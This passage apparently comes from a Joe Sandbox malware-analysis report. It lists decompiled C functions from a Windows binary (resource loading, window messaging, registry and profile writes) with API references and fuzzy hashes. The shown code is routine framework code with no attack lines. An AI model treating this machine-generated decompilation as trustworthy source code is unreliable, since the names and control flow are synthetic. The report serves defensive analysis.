                  								} while (_t35 < ( *(_t70 + 6) & 0x0000ffff));
                  							}
                  							_t44 = E00418C83(_v8, _t61, _t65,  *(_t70 + 6) & 0x0000ffff);
                  							E0040B74E(_t44, _t65, _t70, __eflags, _t65);
                  							__eflags = _t44;
                  							if(_t44 != 0) {
                  								_t55 =  *(_t70 + 4) & 0x0000ffff;
                  								E0041934C(_v8, ( *(_t70 + 2) & 0x0000ffff) + 7, ( *(_t70 + 4) & 0x0000ffff) + 7,  *(_t70 + 2) & 0x0000ffff, _t55);
                  								_t44 = E00419400(_v8, __eflags, _a4);
                  							}
                  							FreeResource(_v12);
                  							_t30 = _t44;
                  						}
                  					}
                  				} else {
                  					L1:
                  					_t30 = 0;
                  				}
                  				return _t30;
                  			}

                  APIs
                  • FindResourceW.KERNEL32(?,004067C9,000000F1), ref: 00419F53
                  • LoadResource.KERNEL32(?,00000000,?,00000080,00000080,?,00406964,004067C9,?,?,004067C9,00000080,?,?,?,0000E800), ref: 00419F66
                  • LockResource.KERNEL32(00000000,?,00000080,00000080,?,00406964,004067C9,?,?,004067C9,00000080,?,?,?,0000E800), ref: 00419F74
                  • FreeResource.KERNEL32(004067C9,00000000,?,?,?,?,00000080,00000080,?,00406964,004067C9,?,?,004067C9,00000080), ref: 0041A000
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 8b073e9d9c4effdb3cbde12bbbdb45fa544cfedb4d8f83069b9da15b990b3ad1
                  • Instruction ID: 52d7cf97b8e89df7df94016f1be127c4d0e1ddb89b48b4ccf54d5b2c19ecb51e
                  • Opcode Fuzzy Hash: 8b073e9d9c4effdb3cbde12bbbdb45fa544cfedb4d8f83069b9da15b990b3ad1
                  • Instruction Fuzzy Hash: 3F213372100210BBDB189FB5CC958FBF7A8EF89714700842EF946D7291EB39DD82D268
                  Uniqueness

                  Uniqueness Score: 0.08%

                  C-Code - Quality: 84%
                  			E004133B9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				long _t44;
                  				void* _t52;
                  				void* _t60;
                  				void* _t72;
                  				intOrPtr* _t73;
                  				void* _t74;
                  				void* _t75;
                  
                  				_push(8);
                  				E0042922B(E00438C8C, __ebx, __edi, __esi);
                  				_t72 = __ecx;
                  				_t55 = 0;
                  				_t70 = 1;
                  				 *((intOrPtr*)(_t75 - 0x14)) = 0;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
                  					if(__eflags == 0) {
                  						goto L10;
                  					} else {
                  						__eflags =  *(__ecx + 0x20);
                  						if(__eflags == 0) {
                  							goto L10;
                  						} else {
                  							E00404820(_t75 - 0x10);
                  							 *(_t75 - 4) = 1;
                  							_t70 = 0x104;
                  							_t55 = E00405860(_t75 - 0x10, __eflags, 0x104);
                  							_t44 = SendMessageW( *(E0040E20E(_t55, _t75 - 0x10, GetParent( *(_t72 + 0x20))) + 0x20), 0x464, 0x104, _t55);
                  							_t60 = _t75 - 0x10;
                  							__eflags = _t44;
                  							if(__eflags >= 0) {
                  								goto L5;
                  							} else {
                  								E004057B0(_t55, _t60, 0x104, _t72, __eflags);
                  								 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                  								__eflags =  *((intOrPtr*)(_t75 - 0x10)) + 0xfffffff0;
                  								E004055F0( *((intOrPtr*)(_t75 - 0x10)) + 0xfffffff0);
                  								goto L10;
                  							}
                  						}
                  					}
                  				} else {
                  					_t78 =  *(__ecx + 0x20);
                  					if( *(__ecx + 0x20) == 0) {
                  						L10:
                  						_push( *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x74)) + 0x24)));
                  						E00410F00(_t55,  *((intOrPtr*)(_t75 + 8)), _t70, _t72, __eflags);
                  					} else {
                  						_t73 =  *((intOrPtr*)(__ecx + 0x80));
                  						_t52 =  *((intOrPtr*)( *_t73 + 0x40))(_t73, _t75 - 0x14);
                  						_push( *((intOrPtr*)(_t75 - 0x14)));
                  						_t74 = _t52;
                  						E00410F00(0, _t75 - 0x10, 1, _t74, _t78);
                  						_t79 = _t74;
                  						 *(_t75 - 4) = 0;
                  						if(_t74 >= 0) {
                  							__imp__CoTaskMemFree( *((intOrPtr*)(_t75 - 0x14)));
                  						}
                  						_t60 = _t75 - 0x10;
                  						L5:
                  						E0040E100(_t55, _t60, _t70, 0xffffffff);
                  						E00405590( *((intOrPtr*)(_t75 + 8)), _t79, _t75 - 0x10);
                  						E004055F0( *((intOrPtr*)(_t75 - 0x10)) + 0xfffffff0);
                  					}
                  				}
                  				return E00429303( *((intOrPtr*)(_t75 + 8)));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004133C0
                  • CoTaskMemFree.OLE32(00000000), ref: 00413404
                  • GetParent.USER32(?), ref: 0041345C
                  • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00413472
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: H_prolog3$AllocatorDebugFreeHeapMessageParentSendTask
                  • String ID:
                  • API String ID: 2013911899-0
                  • Opcode ID: aa1d76451e07afb27f1fcca594dfe4670d68b73288d1ec429b2d6829940d5632
                  • Instruction ID: b402bb67a476cedb4912565f3dba8c2b333015f97909ad526046621802fc7ffc
                  • Opcode Fuzzy Hash: aa1d76451e07afb27f1fcca594dfe4670d68b73288d1ec429b2d6829940d5632
                  • Instruction Fuzzy Hash: B721B1719006199BCF11EFA1CC899AFB7B5FF04318B040A2EF562672E1DB389940CB19
                  Uniqueness

                  Uniqueness Score: 4.31%

                  C-Code - Quality: 94%
                  			E0041A75B(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
                  				intOrPtr _v12;
                  				char _v16;
                  				struct tagRECT _v32;
                  				struct HDC__* _v44;
                  				char _v52;
                  				struct tagTEXTMETRICW _v112;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				long _t26;
                  				int _t36;
                  				intOrPtr _t41;
                  				void* _t45;
                  				void* _t46;
                  				intOrPtr* _t47;
                  				intOrPtr* _t61;
                  				intOrPtr _t62;
                  
                  				_t61 = __ecx;
                  				_push(0);
                  				E004146FE(_t45,  &_v52, 0, __ecx, __eflags);
                  				_t26 = SendMessageW( *(_t61 + 0x20), 0x31, 0, 0);
                  				_t46 = 0;
                  				if(_t26 != 0) {
                  					_t46 = E0041A6C9( &_v52, _t26);
                  				}
                  				GetTextMetricsW(_v44,  &_v112);
                  				_t65 = _t46;
                  				if(_t46 != 0) {
                  					E0041A6C9( &_v52, _t46);
                  				}
                  				E00414752(_t46,  &_v52, 0, _t61, _t65);
                  				SetRectEmpty( &_v32);
                  				 *((intOrPtr*)( *_t61 + 0x148))( &_v32, _a12);
                  				 *((intOrPtr*)( *_t61 + 0x118))(0x407, 0,  &_v16);
                  				_t47 = _a4;
                  				 *_t47 = 0x7fff;
                  				_t36 = GetSystemMetrics(6);
                  				_t62 =  *((intOrPtr*)(_t61 + 0x98));
                  				_t41 = _t36 + _v12 + _t36 + _v12 - _v32.bottom - _v32.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
                  				 *((intOrPtr*)(_t47 + 4)) = _t41;
                  				if(_t41 < _t62) {
                  					 *((intOrPtr*)(_t47 + 4)) = _t62;
                  				}
                  				return _t47;
                  			}

                  APIs
                    • Part of subcall function 004146FE: __EH_prolog3.LIBCMT ref: 00414705
                    • Part of subcall function 004146FE: GetDC.USER32(00000000), ref: 00414731
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041A77A
                  • GetTextMetricsW.GDI32(?,?), ref: 0041A798
                  • SetRectEmpty.USER32(?), ref: 0041A7B7
                  • GetSystemMetrics.USER32(00000006), ref: 0041A7F3
                    • Part of subcall function 0041A6C9: SelectObject.GDI32(?,00000000), ref: 0041A6DB
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Metrics$EmptyH_prolog3MessageObjectRectSelectSendSystemText
                  • String ID:
                  • API String ID: 2929776503-0
                  • Opcode ID: 781ed61d3ec97589983eee677279c4574a08405b0067c3e14e8f66cad05ffad0
                  • Instruction ID: 5e72d1f020569593b846c5b2d7e7d932fff3eb78f354e40c28e3565b10d8ae56
                  • Opcode Fuzzy Hash: 781ed61d3ec97589983eee677279c4574a08405b0067c3e14e8f66cad05ffad0
                  • Instruction Fuzzy Hash: C021B032A00218AFCB10DFA4DC88DEEBBB9FF84704F04442AF556A7295DB74A951CB64
                  Uniqueness

                  Uniqueness Score: 2.84%

                  C-Code - Quality: 79%
                  			E0042445D(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* __ebp;
                  				void* _t15;
                  				intOrPtr _t18;
                  				void* _t22;
                  				void* _t30;
                  				void* _t31;
                  				void* _t39;
                  				intOrPtr _t43;
                  
                  				_t39 = __edi;
                  				_t30 = __ebx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t43 = __ecx;
                  				_v12 = __ecx;
                  				_t15 = E0040E168(__ebx, __ecx, __edi, __eflags);
                  				if(_t15 != 0) {
                  					if((E00411D59(_t43) & 0x00000100) != 0) {
                  						_t35 = _t43;
                  						_t18 = E0040F8F7(_t43, __edi);
                  						_v8 = _t18;
                  						if(_t18 == 0) {
                  							E00413DD0(_t35);
                  						}
                  						_push(_t30);
                  						_push(_t39);
                  						_t31 = E0040E20E(_t30, _t35, GetForegroundWindow());
                  						if(_v8 == _t31 || E0040E20E(_t31, _t35, GetLastActivePopup( *(_v8 + 0x20))) == _t31 && SendMessageW( *(_t31 + 0x20), 0x36d, 0x40, 0) != 0) {
                  							_t22 = 1;
                  							__eflags = 1;
                  						} else {
                  							_t22 = 0;
                  						}
                  						SendMessageW( *(_v12 + 0x20), 0x36d, 4 + (0 | _t22 == 0x00000000) * 4, 0);
                  					}
                  					_t15 = 1;
                  				}
                  				return _t15;
                  			}

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetForegroundWindow.USER32 ref: 0042449A
                  • GetLastActivePopup.USER32(?), ref: 004244BE
                  • SendMessageW.USER32(?,0000036D,00000040,00000000), ref: 004244D6
                  • SendMessageW.USER32(?,0000036D,00000000,00000000), ref: 004244FB
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ActiveException@8ForegroundLastLongPopupThrow
                  • String ID:
                  • API String ID: 1483153143-0
                  • Opcode ID: 5e01d0021b80f94b93ca2f12c928b94d4bf44d1a51061eb6322084ec4bbdfb35
                  • Instruction ID: 311c84b363ee9cd195a4f0d91d0eb0455680edf92a592f17a1536e3eb6bcd9a6
                  • Opcode Fuzzy Hash: 5e01d0021b80f94b93ca2f12c928b94d4bf44d1a51061eb6322084ec4bbdfb35
                  • Instruction Fuzzy Hash: F6110A72B10220ABDB20BBA6AD45F6F366CDB84344F01007FBA01D71A1E678DE00C66D
                  Uniqueness

                  Uniqueness Score: 1.91%

                  C-Code - Quality: 90%
                  			E0041E9A2(void* __ecx) {
                  				void* _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t24;
                  				void* _t29;
                  				void* _t31;
                  				struct HINSTANCE__* _t33;
                  				signed int _t35;
                  				signed int _t36;
                  				void* _t38;
                  				signed int* _t41;
                  
                  				_push(__ecx);
                  				_push(_t29);
                  				_t38 = __ecx;
                  				_t43 =  *((intOrPtr*)(__ecx + 0x58));
                  				_t41 =  *(__ecx + 0x60);
                  				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                  				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                  					_t33 =  *(E0042083D(_t29, __ecx, _t41, _t43) + 0xc);
                  					_v8 = LoadResource(_t33, FindResourceW(_t33,  *(_t38 + 0x58), 5));
                  				}
                  				if(_v8 != 0) {
                  					_t41 = LockResource(_v8);
                  				}
                  				_t31 = 1;
                  				if(_t41 != 0) {
                  					_t36 =  *_t41;
                  					if(_t41[0] != 0xffff) {
                  						_t24 = _t41[2] & 0x0000ffff;
                  						_t35 = _t41[3] & 0x0000ffff;
                  					} else {
                  						_t36 = _t41[3];
                  						_t24 = _t41[4] & 0x0000ffff;
                  						_t35 = _t41[5] & 0x0000ffff;
                  					}
                  					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
                  						_t31 = 0;
                  					}
                  				}
                  				if( *(_t38 + 0x58) != 0) {
                  					FreeResource(_v8);
                  				}
                  				return _t31;
                  			}

                  APIs
                  • FindResourceW.KERNEL32(?,00000000,00000005), ref: 0041E9CA
                  • LoadResource.KERNEL32(?,00000000), ref: 0041E9D2
                  • LockResource.KERNEL32(00000000), ref: 0041E9E4
                  • FreeResource.KERNEL32(00000000), ref: 0041EA32
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 299c2116452fd0b37ca2ee2ee887d53da6ad5da2f0d358c592aa7821d71ed19d
                  • Instruction ID: 73f21ec7793714c15391b446980484fc0b858eba64b7cd239c20c80e800d1a50
                  • Opcode Fuzzy Hash: 299c2116452fd0b37ca2ee2ee887d53da6ad5da2f0d358c592aa7821d71ed19d
                  • Instruction Fuzzy Hash: AD11EF39600711EBDB209FA2D848AE7B7B4FF04395F10806AEC8263751E379ED90D7A4
                  Uniqueness

                  Uniqueness Score: 0.08%

                  C-Code - Quality: 95%
                  			E0041D3DC(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t37;
                  				intOrPtr _t44;
                  				void* _t46;
                  				intOrPtr* _t52;
                  				void* _t53;
                  				void* _t54;
                  
                  				_t54 = __eflags;
                  				_t47 = __ecx;
                  				_t45 = __ebx;
                  				_push(4);
                  				E0042922B(E0043924F, __ebx, __edi, __esi);
                  				_t52 = __ecx;
                  				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
                  				E0041DA26(__ebx, __ecx, __edi, __ecx, _t54);
                  				 *((intOrPtr*)(_t53 - 4)) = 0;
                  				 *_t52 = 0x4401bc;
                  				_t55 =  *((intOrPtr*)(_t53 + 8));
                  				if( *((intOrPtr*)(_t53 + 8)) == 0) {
                  					 *((intOrPtr*)(_t52 + 0x50)) = 0;
                  				} else {
                  					_t44 = E0042B22A(__edx,  *((intOrPtr*)(_t53 + 8)));
                  					_pop(_t47);
                  					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
                  				}
                  				_t46 = E0042083D(_t45, 0, _t52, _t55);
                  				_t56 = _t46;
                  				if(_t46 == 0) {
                  					L4:
                  					E00413DD0(_t47);
                  				}
                  				_t7 = _t46 + 0x74; // 0x74
                  				_t47 = _t7;
                  				_t37 = E00417474(_t46, _t7, 0, _t52, _t56);
                  				if(_t37 == 0) {
                  					goto L4;
                  				}
                  				 *((intOrPtr*)(_t37 + 4)) = _t52;
                  				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
                  				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
                  				 *((intOrPtr*)(_t46 + 4)) = _t52;
                  				 *((short*)(_t52 + 0x92)) = 0;
                  				 *((short*)(_t52 + 0x90)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x44)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x64)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x68)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x60)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x88)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x58)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x48)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x80)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x84)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x70)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x74)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x94)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
                  				return E00429303(_t52);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041D3E3
                    • Part of subcall function 0041DA26: __EH_prolog3.LIBCMT ref: 0041DA2D
                  • __wcsdup.LIBCMT ref: 0041D405
                  • GetCurrentThread.KERNEL32(00000004,00408481,00000000), ref: 0041D432
                  • GetCurrentThreadId.KERNEL32 ref: 0041D43B
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CurrentH_prolog3Thread$__wcsdup
                  • String ID:
                  • API String ID: 190065205-0
                  • Opcode ID: 06e325444c09c92637faf52df9b12301e0e0fae3b302526febd8ccccf688ee8b
                  • Instruction ID: ef881a1b005133299fbae937796e1d6a734a636c9b503de1267f9aef96775d5c
                  • Opcode Fuzzy Hash: 06e325444c09c92637faf52df9b12301e0e0fae3b302526febd8ccccf688ee8b
                  • Instruction Fuzzy Hash: 40219FB0900B50CEC7219F7A944529AFBF8BFA4704F10891FD5AAC7722DBB4A541CF59
                  Uniqueness

                  Uniqueness Score: 5.54%

                  C-Code - Quality: 90%
                  			E00415241(void* __ebx, void* __edi, void* __esi, void* __eflags, long* _a4, intOrPtr _a8, short _a12) {
                  				intOrPtr* _v0;
                  				void* _v4;
                  				signed int _v8;
                  				intOrPtr _v16;
                  				long* _t20;
                  				intOrPtr* _t23;
                  				long _t25;
                  				intOrPtr _t31;
                  				long* _t32;
                  				void* _t42;
                  
                  				_t42 = __eflags;
                  				_push(4);
                  				E0042922B(E004391D6, __ebx, __edi, __esi);
                  				_t31 = E0040B71F(_t42, 0xc);
                  				_v16 = _t31;
                  				_t20 = 0;
                  				_v4 = 0;
                  				if(_t31 != 0) {
                  					_t20 = E00415229(_t31);
                  				}
                  				_t32 = _a4;
                  				_v8 = _v8 | 0xffffffff;
                  				 *((intOrPtr*)(_t20 + 8)) = _t32;
                  				_a4 = _t20;
                  				E00428ED5( &_a4, 0x4469c0);
                  				asm("int3");
                  				_t23 = _v0;
                  				if(_t23 != 0) {
                  					 *_t23 = 0;
                  				}
                  				_t25 = FormatMessageW(0x1100, 0,  *(_t32 + 8), 0x800,  &_a12, 0, 0);
                  				if(_t25 != 0) {
                  					E0041594E(_a4, _a8, _a12, 0xffffffff);
                  					LocalFree(_a12);
                  					_t25 = 1;
                  					__eflags = 1;
                  				} else {
                  					 *_a4 = _t25;
                  				}
                  				return _t25;
                  			}














                  APIs
                  • __EH_prolog3.LIBCMT ref: 00415248
                    • Part of subcall function 0040B71F: _malloc.LIBCMT ref: 0040B73D
                  • __CxxThrowException@8.LIBCMT ref: 0041527E
                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,?,8007000E,004469C0,00000004,00404BDC,8007000E), ref: 004152A8
                  • LocalFree.KERNEL32(8007000E,8007000E), ref: 004152D0
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                  • String ID:
                  • API String ID: 1776251131-0
                  • Opcode ID: 5e6df2becfa6e09828654a8640acb390f50aa6cdf0f6b6a8d0bfdc81a1abea6a
                  • Instruction ID: 02324c6122893bd6bcbeda5571be5b36afebca98924324510bf0fce6ca3f1785
                  • Opcode Fuzzy Hash: 5e6df2becfa6e09828654a8640acb390f50aa6cdf0f6b6a8d0bfdc81a1abea6a
                  • Instruction Fuzzy Hash: DB117071604209EFDB04AFA5DC05AEE3BA5FF88310F24896AF525CB2D0DB758950CB59
                  Uniqueness

                  Uniqueness Score: 1.91%

                  C-Code - Quality: 100%
                  			E004102B1(intOrPtr* __ecx) {
                  				void* __ebx;
                  				void* __edi;
                  				struct HWND__* _t14;
                  				intOrPtr* _t19;
                  				void* _t20;
                  
                  				_t21 = __ecx;
                  				_t19 = __ecx;
                  				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
                  					_t21 = __ecx;
                  					 *((intOrPtr*)( *__ecx + 0x188))();
                  				}
                  				SendMessageW( *(_t19 + 0x20), 0x1f, 0, 0);
                  				E0040ED9C(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
                  				_t22 = _t19;
                  				_t20 = E0040F8F7(_t19, 0);
                  				if(_t20 == 0) {
                  					E00413DD0(_t22);
                  				}
                  				SendMessageW( *(_t20 + 0x20), 0x1f, 0, 0);
                  				E0040ED9C(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
                  				_t14 = GetCapture();
                  				if(_t14 != 0) {
                  					return SendMessageW(_t14, 0x1f, 0, 0);
                  				}
                  				return _t14;
                  			}









                  APIs
                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004102DD
                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00410308
                  • GetCapture.USER32 ref: 0041031A
                  • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 00410329
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$Capture
                  • String ID:
                  • API String ID: 1665607226-0
                  • Opcode ID: caaefa77a2ec4d08105200073c0787d47354c2d8573f8946a8549505833edc8d
                  • Instruction ID: b9673430c9843edded79f004319254fc547e9314b671ad51b4fc7d094086bcde
                  • Opcode Fuzzy Hash: caaefa77a2ec4d08105200073c0787d47354c2d8573f8946a8549505833edc8d
                  • Instruction Fuzzy Hash: F00121313502557BDB302B638C8DFDB3E7ADFC9F10F150479B604AA1EBCAA54890D624
                  Uniqueness

                  Uniqueness Score: 0.31%

                  C-Code - Quality: 94%
                  			E0041E43D(void* __ecx, intOrPtr __edx, WCHAR* _a4, short* _a8, char _a12) {
                  				signed int _v8;
                  				short _v40;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t13;
                  				WCHAR* _t21;
                  				short* _t24;
                  				intOrPtr _t28;
                  				void* _t30;
                  				signed int _t31;
                  
                  				_t28 = __edx;
                  				_t13 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t13 ^ _t31;
                  				_t24 = _a8;
                  				_t30 = __ecx;
                  				_t29 = _a4;
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					swprintf( &_v40, 0x10, L"%d", _a12);
                  					_t18 = WritePrivateProfileStringW(_t29, _t24,  &_v40,  *(_t30 + 0x68));
                  				} else {
                  					_t30 = E0041E3F5(__ecx, _t29);
                  					if(_t30 != 0) {
                  						_t21 = RegSetValueExW(_t30, _t24, 0, 4,  &_a12, 4);
                  						_t29 = _t21;
                  						RegCloseKey(_t30);
                  						_t18 = 0 | _t21 == 0x00000000;
                  					}
                  				}
                  				return E00427DFF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                  			}















                  APIs
                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 0041E478
                  • RegCloseKey.ADVAPI32(00000000), ref: 0041E481
                  • swprintf.LIBCMT ref: 0041E49E
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041E4AF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                  • String ID:
                  • API String ID: 22681860-0
                  • Opcode ID: 48e4a31b04de04860f7533b672171687b8347594666ad1bd78a6cd8ee1069714
                  • Instruction ID: d5b0184e989ef4cbf1e6960da441591227b783d346d9c5bf8dc3b8f9a138e00e
                  • Opcode Fuzzy Hash: 48e4a31b04de04860f7533b672171687b8347594666ad1bd78a6cd8ee1069714
                  • Instruction Fuzzy Hash: 2E01C076A00318BBDB10DF659C45FEF77ACEF49B08F14042AFA01A7180DA78ED1187A9
                  Uniqueness

                  Uniqueness Score: 0.43%

                  C-Code - Quality: 73%
                  			E004166D9(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
                  				signed int _v8;
                  				short _v528;
                  				signed int _v532;
                  				int _v536;
                  				void* __ebx;
                  				void* __edi;
